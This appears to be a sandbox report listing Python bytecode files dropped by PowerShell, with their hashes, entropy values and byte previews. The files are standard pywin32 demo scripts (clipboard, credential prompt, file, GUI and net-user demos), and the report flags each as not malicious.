                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CyD/fVUjtibT3ww0I4sXpXaLboCt4tkzwq9SoT:C4VU8/pXa/COrL
                                                                                                                                                                                                            MD5:56B1EB68CF9CAF8667AB7F3777C780B4
                                                                                                                                                                                                            SHA1:62A4A26E674B4A028C917F7CCC9BC20E7FB7E8F2
                                                                                                                                                                                                            SHA-256:CF6010CAA5AFD3AA64E0CA99C3B4DD2E191E512D3D36795A696A52F9B8397294
                                                                                                                                                                                                            SHA-512:83C478F01AE0DB8CD595490A7A34FC3158B74562E4532648FAC2C0195A324846115752A42580DAF80B416C5A96224C4ABB26AD92C19A7668FBC53E1B874D03EF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.T...i.Z.e.e.j.......D.].\.Z.Z.e.d.d.....d.k.r&e.d.k.r&e.e.e.<.q.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.d.d...Z.e.d.k.rSe.....e.....e.....e.....e.....d.S.d.S.)......N)...*Fz1WARNING: The test code in this module uses assertzKThis instance of Python has asserts disabled, so many tests will be skipped.....Z.CF_Z.CF_SCREENFONTSc....................C...s6...t.....z.t.....t.d...d.k.s.J.d.....W.t.....d.S.t.....w.).Nr....z3Clipboard formats were available after emptying it!)...OpenClipboard..EmptyClipboard..EnumClipboardFormats..CloseClipboard..r....r.....uC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32clipboardDemo.py..TestEmptyClipboard....s..................r....c....................C...s....t.....z!d.}.|...d...}.t.|.....t.t.j...}.|.|.k.s J.d.|...d.......W.t.....n.t.....w.t.....zbt.t.j...}.|.|.k.s>J.d.|...d.......t.|.t...sKJ.d.|...d.......t.t.j...}.|.|.k.s\J.d.|...d.......t.....d
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3315
                                                                                                                                                                                                            Entropy (8bit):5.498395738892531
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Ci2s0J052LClQTvxDdD07LqQBWlZQX76vBIGHD6AAKA3zbiN0p335TGN:CjPjCcpBsWDQL6vBIGHDqKsyNe5T8
                                                                                                                                                                                                            MD5:EC476287C66213AC89C1B5E1F66F9955
                                                                                                                                                                                                            SHA1:41DD466DF3D7D9ABE33BA8F0C5208D68B372FBC8
                                                                                                                                                                                                            SHA-256:351301EB20B3A0B4DC35004845CF2450F82F9ACEEC77A7F23F860F1FC3E94A8F
                                                                                                                                                                                                            SHA-512:1796F85588686183868BC5542B35D2DD6F49F14E7D8B2165316DC920DFAFBE4F7C6DE1527119325AA0D5182B5DE4CCEED2534937E1D52DABD535751482833947
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sL...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.G.d.d...d...Z.e.d.k.r$e...Z.e.......d.S.d.S.)......Nc....................@...sD...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...ViewerWindowc....................C...s....d.|._.d.S...N)...hwndNextViewer)...self..r.....|C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32clipboard_bitmapdemo.py..__init__....s......z.ViewerWindow.__init__c....................C...sP...t...|...\.}.}.t...|...}.|.d...|.d.....}.|.d...|.d.....}.t.......z.z.t...t.j...}.W.n>..t.yg......t.....}.d.|._.d.|._.t...|...}.t...|.|.....t...|.t.j.....t...|.t...d.d.d.......t...|.d.d.d.d.|.|.f.t.j.....Y.n5w.t...|...}.t...d...}.t...|.|.....t...|.d.d.|.|.|.d.d.|.j.|.j.t.j.....t...|.....t...|.|.....W.t.......d.S.W.t.......d.S.t.......w.).N.....r...................z@No bitmaps are in the clipboard.(try pressing the PrtScn button).....)...win32guiZ.BeginPaintZ.GetClientRect..win3
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3218
                                                                                                                                                                                                            Entropy (8bit):5.579020565541885
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CHNz3vds2jx8i5ysETEYd8fk/2q1VMt4bt73qcmEGGnc4vACxsUTvnOzCM:CHNL155y7PBVMtKrq5ELc4vTRIB
                                                                                                                                                                                                            MD5:F0145F56FCEEB8B61B63B6D14FA8FA35
                                                                                                                                                                                                            SHA1:F096D38D17A1332C36AC8F6B4C4B71F8FD769CCA
                                                                                                                                                                                                            SHA-256:6467450EF226463AA40D8A28D35EE062AFC09C816FC33FB1803105F19FAE63AA
                                                                                                                                                                                                            SHA-512:7E610533798D51C5347DE25200456A3201CAEA514C68F247AC90641C30609E9C1E39CB13AEBC2FF49F813F7AF1C1D3A4D00E7E17236608BA3A7F21EACB87A5C7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g+........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.T.d.d...Z.G.d.d...d...Z.e.d.k.rVe.d.....e.e.j...d.k.rGe...Z.e.d.u.rFe.d.....e.d.....e...d.....n.e.j.d...Z.e.e...Z.e.......d.S.d.S.)......N)...*c....................C...sj...t.d.d...D.]-}.d.|.f...}.z.t.|.t.j.t.j.B.d.d.t.j.t.j.d...}.t.|...d.k.r(|.W.....S.W.q...t.y2......Y.q.w.d.S.).N............COM%dr....)...range..CreateFile..win32con..GENERIC_READ..GENERIC_WRITE..OPEN_EXISTING..FILE_ATTRIBUTE_NORMALZ.GetCommModemStatus..error)...i..port..handle..r.....tC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32comport_demo.py..FindModem....s&.........................................r....c....................@...s,...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...SerialTTYc....................C...s....t.|.t...r.d.|.f...}.t.|.t.j.t.j.B.d.d.t.j.t.j.t.j.B.d...|._.t.|.j.t.....t.|.j.d.d.....t.|.j.t.t.B.t.B.t.B.....d.}.t.|.j.|.....t.|.j...}.t.|._.d.|._.t.|._.t
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2634
                                                                                                                                                                                                            Entropy (8bit):6.074522420390625
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CgHIimUFLj9lA80+99N7JlA1PgC0xPOpcHh0asX7RtDqHrvo28Z34GkNjS:CgHIhKQl+1MgRIQhILP0rvwZ34GkNG
                                                                                                                                                                                                            MD5:88AD5181F6E759EE8443031AAFA4620D
                                                                                                                                                                                                            SHA1:74906651DFFDC7EEC20663B85D2D13F5E859488D
                                                                                                                                                                                                            SHA-256:8574EDDFBF1E750F76FD66F92CEB4D24B1172EBE28D92299D7AFD7C923822506
                                                                                                                                                                                                            SHA-512:73C6B8C68F69A7AAF38C832B3362D51619646837E39790A575673E69B481A169D38AB2292116636635802D327B1EFA8F24D7C98E4036159F741CF371FA04D04C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g|........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.i.Z.e.e.j.......D.].\.Z.Z.e...d...r"e.e.e.<.q.d.Z.z.e.......W.n...e.j.yF..Z...z.e.j.d.k.r:..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.e...e.j...Z.e...e.j...Z.e.....Z.e.......e...e.j.e.j.B.e.j.B.e.j.B.....e...d.....e.....d...Z.e.j.e.j d...e.j!d...d...Z"e..#e"....e...j d.7..._ e...j!d.7..._!e.j$d.e.d.....e..%e.j&..Z'd.e'_(d.e'_)d.e'_*d.e'_+e.j,e'_-e..%e.j&..Z.d.e._(d.e._)d.e._*d.e._+e.j,e._-e../e'e.e'g.....e...e.j.e.j.B.e.j.B.e.j.B.....e...d.....e...e.j0e.j.B.e.j1B.e.j.B.....e...d.....d.Z2e2..s.e..3d...Z4e4D.].Z5e5j6e.j&k...r8e5j)..r6e5j(d.k...r%e...e..7e5j+d.e5j+........n.e...e5j(....e5j+e.j8k...r6d.Z2..n...q.e5j6e.j9k...r.e5j:d.k...r.e5j;d.k...r.e5j<Z=e.j>d.e=d...d...Z?e?Z@e?e.j0@...rhe@e.j0..@.e.jAB.Z@e?e.j.@...rwe@e.j...@.e.j1B.Z@e?e.jB@...r.e@e.jB..@.e.j.B.Z@e?e.jA@...r.e@e.jA..@.e.j0B.Z@e?e.j1@...r.e@e.j1..@.e.j.B.Z@e?e.j.@...r.e@e.j...@.e.jBB.Z@e..Ce@f.e=......q.e...eDe5........q.e..Ed.....e2r.e.......e..F....e...r.e..G....d.S.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1950
                                                                                                                                                                                                            Entropy (8bit):5.9263510287002985
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CmWXdma77FqmQ4WkcPnol6khK540DA2FNA2OrFG:CBtma7J3Q+cvoVh84oAnrU
                                                                                                                                                                                                            MD5:0F5F559DAD13AF37B51A2156982CF061
                                                                                                                                                                                                            SHA1:DF8CF36BFC689CC2472AB3C563E03270DA9C7721
                                                                                                                                                                                                            SHA-256:9F1495879D823BF7676D2A3FB1A5A5229D7B4D666CC7A58D18C7CDD9C508B9F5
                                                                                                                                                                                                            SHA-512:95D0518693B9114D1A896FC71151B8235741AFF931622723B5C1A6AA612E3F5A2C3AA69192EEC84165183680AA1FA267380CD517623D290553F0AB18189302B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.e.....d.e.j.e.j.B.d.e.d...\.Z.Z.Z.d.d.d.d...d.d.d.d...g.Z.d.e.d.e.e.e.j.e.j.e.j.e.d...Z.e...e.....d.Z.e.e...e.e.j.......e...e.j.e...Z.zNe...e.d.d.e.j.e.j...Z.e...e.....e.d.e.........e.. ....e..!e...\.Z"Z#e..$d.e"d...Z%e%d...Z&e&s.d.Z&e..'e.e"d.e&d.....Z(e..)e.d...Z*e..+e.e(....e..,....W.d.S...e.j-y...Z...z.e.d.e.....W.Y.d.Z.[.d.S.d.Z.[.w.w.).z..Demonstrates prompting for credentials, saving, and loggging on with marshalled credential..Also shows how to load user's profile......Nz#Enter credentials for local machinez.win32cred_demo.py).Z.MessageTextZ.CaptionTextF)...TargetNameZ.AuthError..FlagsZ.SaveZ.UiInfoZ.attr1z.unicode data)...Keywordr......ValueZ.attr2s....character dataz.Created by win32cred_demo.py)...Comment..UserNameZ.TargetAliasr....Z.CredentialBlobr....Z.Persist..TypeZ.Attributes..z.GetUserName:.....Z.profile).r....r....Z.ProfilePathz.Failed to login for some reaso
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):967
                                                                                                                                                                                                            Entropy (8bit):5.578625596873931
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Cx8ObTWTXaGR/Hn0s3XxOuvMvtrsZu212+Qlhthz3lu:CKOgR/lxOlUB2TFlu
                                                                                                                                                                                                            MD5:CE6A6B3E126C76002798C2AEB0E23A98
                                                                                                                                                                                                            SHA1:A5189F91E6CF5F3BD454277DD56130F90654AE45
                                                                                                                                                                                                            SHA-256:D074615BE60690FB5D70C6D2C529EBA53350EEFF11B6E863EFBFF784A5074A69
                                                                                                                                                                                                            SHA-512:BF1D16AE29123DD9041D3A7170796731F735994F7AFE76F7E83A47D4CA6FD66682D12B1BCADA69A74B3E4BD50D437121DFB39A0173CF26778892803EA2385C83
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s>...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e.d.k.r.e.....d.S.d.S.)......Nc....................C...s....t.j...t.....d...}.t.j...|...r.t...|.....t...|.t.j.d.d.t.j.d.d...}.d.}.t...|.|.....|.......t...|.t.j.d.d.t.j.d.d...}.t...|.d...\.}.}.|.......|.|.k.rOt.d.....n.t.d.....t...|.....d.S.).NZ.win32file_demo_test_filer....s....Hello.therei....z"Successfully wrote and read a filez.Got different data back???)...os..path..join..win32apiZ.GetTempPath..exists..unlink..win32file..CreateFile..GENERIC_WRITE..win32conZ.CREATE_NEW..WriteFile..Close..GENERIC_READ..OPEN_EXISTING..ReadFile..print..Exception).Z.testName..handleZ.test_data..rc..data..r.....pC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32fileDemo.py..SimpleFileDemo....s$.......................................r......__main__).r....r....r....r....r......__name__r....r....r....r......<module>....s....................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4056
                                                                                                                                                                                                            Entropy (8bit):5.569946863269541
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:C0HZNsrO+Bt6bBQzJVcNcI4kOf0IQxyrECKu2NHGeyNsXG:CE+rzF/wu0IHD2t8sXG
                                                                                                                                                                                                            MD5:5B791861B7C9654396B9731937A64E51
                                                                                                                                                                                                            SHA1:721C6F7E50A472B4909B56365A0B9085D90D1BE2
                                                                                                                                                                                                            SHA-256:62365286714C963B12AE57A062508A6E25545BEF0E2E87BDC542B89820735934
                                                                                                                                                                                                            SHA-512:7134A012A685E5C1A157D8861F1367F7047F940713E896879D335661389B53899900035EEB0A84959D48EF54F147856F7832C6F39DF2F0839060D9D16754F27E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gU........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d.d...Z.e.j.e.i.Z.d.d...Z.e.j.e.i.Z.d.d...Z.d.d...Z.e.d.....e.....e.d.....e.....e.....e.d.....d.S.)......Nc....................C...s$...|.\.}.}.|...|.....d.|.t...|...<.d.S.).N.....)...append..win32guiZ.GetClassName)...hwnd..extraZ.hwnds..classes..r.....pC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32gui_demo.py.._MyCallback....s..........r....c....................C...sH...g.}.i.}.t...t.|.|.f.....t.d.t.|...t.|...f.......d.|.v.r"t.d.....d.S.d.S.).Nz0Enumerated a total of %d windows with %d classesZ.tooltips_class32zCHrmmmm - I'm very surprised to not find a 'tooltips_class32' class.).r....Z.EnumWindowsr......print..len)...windowsr....r....r....r......TestEnumWindows....s..........................r....c....................C...sX...t...|...\.}.}.t...|.t.j.....t...t...d.d.d.....}.t...|.|.....t...|.t.j...}.t...|.t.j.|.d.......|.t.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2422
                                                                                                                                                                                                            Entropy (8bit):5.9928202112106295
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CpluLqmuc4XzoA2SiWHTA65aUHtMvg8olmhdKCBq3kbwAYc1yhErZ83Ii3cA1r+J:Cplu+vcCzQW/H18ldKSq3AYcEGj2cIaJ
                                                                                                                                                                                                            MD5:AA7C192185CC55FE022D5E23658A4EF6
                                                                                                                                                                                                            SHA1:C29CB4D9EBF9ABD7B5D96AD48A3789C9D296974A
                                                                                                                                                                                                            SHA-256:8BE84EA1B519DE0AD2984461ABD5614E4ED1E21E0D97CFD54EBF9D1123987C68
                                                                                                                                                                                                            SHA-512:089DFCF503B3735ECF208941F3BFACCB5CFF70F4D26FECDC8E16C09E7F75596F0BD993C144ABBC077E53D01ACBF450E08424CE1F0DDE2AF69E6211115561B9D0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g`........................@...sv...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d...Z.d.d...Z.e.d.k.r9e.e.j.d.d.........d.S.d.S.)......Nz&{A5DCBF10-6530-11D2-901F-00C04FB951ED}c....................C...sT...t...|...}.t.d.|.t.|.......|.t.j.k.r(|.j.t.j.k.r(t.d.....t...|.j.....t...|.j.....d.S.).Nz.Device change notification:z%Device being removed - closing handleT)...win32gui_structZ.UnpackDEV_BROADCAST..print..str..win32conZ.DBT_DEVICEQUERYREMOVEZ.devicetypeZ.DBT_DEVTYP_HANDLE..win32file..CloseHandle..handle..win32guiZ.UnregisterDeviceNotificationZ.hdevnotify)...hwnd..msgZ.wpZ.lp..info..r.....xC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32gui_devicenotify.py..OnDeviceChange....s....................r....c....................C...s6...t.....}.d.|._.t.j.t.j.B.t.j.B.|._.t.j.d...|._.t.j.t.i.|._.t...|...}.t...|.j.d.t.j.d.d.d.d.d.d.d.d...}.g.}.t...t...}.t...|.|.t.j...}.|...|.....|.D.],}.t...|.t.j.t.j.t.j.B.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11986
                                                                                                                                                                                                            Entropy (8bit):5.477260807914314
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CkereAENv6IILhYnMGIAFsKzYHMYhe11KuTGkIyTPQ7A78pCOMRQkAPDaKEFEAAE:nqeAAv6IILqMYsnHheCuT5IyrQrRMRQ+
                                                                                                                                                                                                            MD5:5E2CDC9F4478C7B30DDC3D5198DC2C37
                                                                                                                                                                                                            SHA1:0C7B61157BBDD46DB5B674480CAE9E8000706B88
                                                                                                                                                                                                            SHA-256:C4EF19818EE2799013A8DCFDCB90EC7D7DB49643A9E4D632514E182C4C67CD59
                                                                                                                                                                                                            SHA-512:F137E7C9E18804D5884450426C0FCC2797AABDA879E56D6D843AA82DDED4A326A3A47AB80A027BDDBEE863C660E460E2130B0C1538A070C9901C13767C5C30E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.=.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.j.d...Z.e.j.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.e.d.k.r|e.....e.....d.S.d.S.)......Ni....i....i....i....i....i....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._WIN32MASKEDSTRUCTc....................K...sv...d.}.|.j.D.].\.}.}.}.}.d.|.j.|.<.|.d.k.r.|.d.7.}.q.|.|.7.}.q.|.....D.].\.}.}.|.|.j.v.r3t.d.|...d.......|.|.j.|.<.q"d.S.).N....z..piz'LVITEM structures do not have an item '..')..._struct_items_..__dict__..items..ValueError)...self..kw..full_fmt..name..fmt..default..mask..val..r.....rC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32gui_dialog.py..__init__ ...s..........................z._WIN32MASKEDSTRUCT.__init__c....................C...s*...|...d...s.|.|.j.v.r.t.|.....|.|.j.|.<.d.S.).N.._)
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7927
                                                                                                                                                                                                            Entropy (8bit):5.866354565540577
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:COi2AlWZ6L3H/41jlrSV1gqAVNo3r7aBTmqY9gWBXeJr+7f5uG:wYZwv41jlrkgquNqPaT8CJy7YG
                                                                                                                                                                                                            MD5:9BF0CE6E1799F6E3C6289E7168327763
                                                                                                                                                                                                            SHA1:A0A5EE6315C0686F73DD9B92442DB5AF8704278D
                                                                                                                                                                                                            SHA-256:9E431DD5C7178A8724D88C2501E72F14E0B9AACB0900E2694AF383B34C586B2B
                                                                                                                                                                                                            SHA-512:B04C7FEB8372C8C639F8471B583DBCDD365FDE1A755BD228141A611549B51F3E2A75D51D2D5F21D772CE760964DFDCC1688139C18B9317499565B1BB55CADE24
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.?.......................@...sz...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.T.d.d.l.T.e.j...e.j.d.....d...Z.G.d.d...d...Z.d.d...Z.e.d.k.r;e.....d.S.d.S.)......N)...*c....................@...sD...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...MainWindowc....................C...s....t.j.|.j.t.j.|.j.t.j.d...|.j.t.j.|.j.t.j.|.j.i.}.t...}.t.d.....}.|._.d.|._.|.|._.t.|...}.t.j.t.j.B.}.t.|.d.|.d.d.t.j.t.j.d.d.|.d...|._.t.|.j.....t.j...t.j...t.j.d.....}.t.j...|...slt.j...t.j...t.j...t.j...d...d.....}.t.j...|...r.t.j t.j!B.}.t"|.|.t.j#d.d.|...}.n.d.}.t$d.....t%d.t.j&..}.|.|._'t(t.j)..}.t*|.d.....|._+t,t.j-..d...|._.|.j.|._/d.|._0i.|._1|..2....t3t4B.t5B.}.|.j.d.|.t.j.d...|.d.f.}.t6t7|.....t$d.....d.S.).N.....Z.PythonTaskbarDemoz.Taskbar Demor....z.pyc.icoz...\PC\pyc.icoz-Can't find a Python icon file - using defaultZ.lfMenuFont..........z.Python Demoz4Please right-click on the Python icon in the taskbar)8..win32conZ.WM_DESTROY..OnDestroy..WM_COMMAND..OnCo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4016
                                                                                                                                                                                                            Entropy (8bit):5.64726749791227
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CuLxJaB9uEcNH4KaR+BVS7FknlxO7FhC8XCjuolq11:CeJa+Hnjvs2lE7FP/og11
                                                                                                                                                                                                            MD5:EB582CD528B38FD2811A39D7E641045D
                                                                                                                                                                                                            SHA1:2A6BA11A8C47EF1076723AC6F4F9A1D15DA1E3C2
                                                                                                                                                                                                            SHA-256:017D92F6815CAC1F0BE9C466341E1EBC8552D3C667279149008494322E820CF1
                                                                                                                                                                                                            SHA-512:11389AE23B11F9013A9BF844CBD4BB49FC1AA1E1C414A5D04B4FC9D80875184455AC8F88B2A5FC76F1DD3ADF08C8137CD3ECF5EDCD1FF837E06D9EAC95898A4E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s\...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.G.d.d...d...Z.d.d...Z.e.d.k.r,e.....d.S.d.S.)......Nc....................@...s<...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...MainWindowc....................C...s....t...d...}.|.|.j.t.j.|.j.t.j.|.j.t.j.d...|.j.i.}.t.....}.t...d.....}.|._.d.|._.t.j.t.j.B.|._.t...d.t.j...|._.t.j.|._.|.|._.z.t...|...}.W.n...t.j.y^..}...z.|.j.t.j.k.rT..W.Y.d.}.~.n.d.}.~.w.w.t.j.t.j.B.}.t...|.j.d.|.d.d.t.j.t.j.d.d.|.d...|._ t..!|.j ....|.."....d.S.).NZ.TaskbarCreated.....Z.PythonTaskbarDemor....z.Taskbar Demo)#..win32guiZ.RegisterWindowMessage..OnRestart..win32conZ.WM_DESTROY..OnDestroyZ.WM_COMMAND..OnCommand..WM_USER..OnTaskbarNotifyZ.WNDCLASS..win32api..GetModuleHandleZ.hInstanceZ.lpszClassNameZ.CS_VREDRAWZ.CS_HREDRAW..styleZ.LoadCursorZ.IDC_ARROWZ.hCursorZ.COLOR_WINDOWZ.hbrBackgroundZ.lpfnWndProcZ.RegisterClass..error..winerrorZ.ERROR_CLASS_ALREADY_EXISTSZ.WS_OVERLAPPEDZ.WS_SYSMENUZ.CreateWin
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7449
                                                                                                                                                                                                            Entropy (8bit):5.511956442825151
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CHFmXn/H0LmHLA5pvHTfm/D018EdlaNJTJr+rZ+:CwgoAbzf+gdQTS0
                                                                                                                                                                                                            MD5:DEB1384EBE17844A527F8DEEC8398D37
                                                                                                                                                                                                            SHA1:3036A334A856FFEC46AFE0B73BB51F57FD9F636E
                                                                                                                                                                                                            SHA-256:C0820CB43CA5CD5E13147863CA89E05EAB04B25D96F2ADA0F44FA7B7F01C4395
                                                                                                                                                                                                            SHA-512:ACAF4ADAF8BD6D86C5914C84EFC3276F8898F1B24DCA6AB1BB98AF402E44741773D48D67868DE1801A42EDE11232A9D63FE48ECF138987017EBAC04487215D0F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g $.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rbe.....d.S.d.S.)......N)...Callablec....................C...s....t.r.t.|.....d.S.d.S...N)...verbose_level..print)...msg..r.....oC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32netdemo.py..verbose....s..........r....c....................C...s....d.}.z.t...t.|.....t.d.....W.n...t.j.y.......Y.n.w.i.}.|.|.d.<.d.|.d.<.t.j.|.d.<.d.|.d.<.t.j.t.j.B.|.d.<.t...t.d.|.....z)z.t...t.|.d.d.....t.d.....W.n...t.j.yT......Y.n.w.t...t.|.d.d.....W.t...t.|.....n.t...t.|.....w.t.d.....d.S.).z.Creates a new test user, then deletes the userZ.PyNetTestUserz*Warning - deleted user before creating it!..nameZ.deleteme..passwordZ.privz'Delete me - created by Python test code..comment..flags.....Z.wrong..newz:ERROR: NetUserChangePasswo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3281
                                                                                                                                                                                                            Entropy (8bit):5.402992612564685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CqmEMOkDq0cg28l99TZWNHVhRRGjtuXBxBgwk+lM6sTzhTjqPw1sOQjwtdOVp1MQ:CqhkcIl99KVhbOtoqwkuMxz58vOQwkn
                                                                                                                                                                                                            MD5:44AA0717184ADA66D8FF930F94CA19DC
                                                                                                                                                                                                            SHA1:9ADB8378819C3BE5FC010CDA8D69F4D6935D152A
                                                                                                                                                                                                            SHA-256:93CEA85BD379E80F144BE6FECE5BDDE79F046DCBD9A5CF26FEA58FF2F540CEB6
                                                                                                                                                                                                            SHA-512:1C070798EFF6BA886B400486CDC81E539C861E82FE845A0C8AE8D44555A9678652E18A5AC2619A8F1FDF2ED5AFAAEEA711AFCEE18838866EA3FD3A0A264C1F7E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
